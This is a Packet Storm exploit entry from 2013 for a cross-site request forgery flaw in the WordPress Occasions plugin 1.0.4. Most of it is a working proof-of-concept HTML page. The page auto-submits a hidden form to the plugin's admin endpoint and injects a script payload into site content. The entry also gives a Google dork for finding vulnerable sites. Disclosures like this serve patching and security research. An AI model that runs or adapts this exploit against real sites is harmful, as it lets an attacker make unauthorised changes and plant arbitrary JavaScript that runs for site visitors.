WordPress Occasions 1.0.4 Cross Site Request Forgery

2013-03-19T00:00:00
ID PACKETSTORM:120871
Type packetstorm
Reporter m3tamantra
Modified 2013-03-19T00:00:00

Description

                                        
                                            `<html>  
<!--  
# Exploit Title: WordPress Occasions Plugin 1.0.4 CSRF  
# Google Dork: inurl:"/wp-content/plugins/occasions  
# Date: 18.03.2013  
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)  
# Vendor Homepage: http://wordpress.org/extend/plugins/occasions/  
# Software Link: http://downloads.wordpress.org/plugin/occasions.zip  
# Version: 1.0.4  
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)  
  
You can use the CSRF vulnerability to add/delete Occasions. It is also possible to enter JavaScript in occ_content1 parameter when occ_type1=1 .  
Think this is a feature not a bug, anyway because of the CSRF vulnerability this can be used to execute arbitrary JavaScript in the front-end area  
(shortcode = [Occasions]).  
  
PoC will add an alert in the front-end area.  
Note: check occ_startdate1 and occ_enddate1 and set them appropriate.  
  
-->  
  
<head><title>CSRF Occasions</title></head>  
<body>  
<!-- replace 127.0.0.1:9001/wordpress -->  
<form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST">  
<input type="hidden" name="action" value="saveoccasions" />  
<input type="hidden" name="nodes[]" value="1" />  
<input type="hidden" name="occ_title1" value="CSRF Vulnerability" />  
<input type="hidden" name="occ_startdate1" value="18.03." />  
<input type="hidden" name="occ_enddate1" value="28.03." />  
<input type="hidden" name="occ_type1" value="1" />  
<input type="hidden" name="occ_content1" value="<script>alert(1)</script>" />  
<script>document.forms[0].submit();</script>  
</form>  
</body>  
</html>  
  
`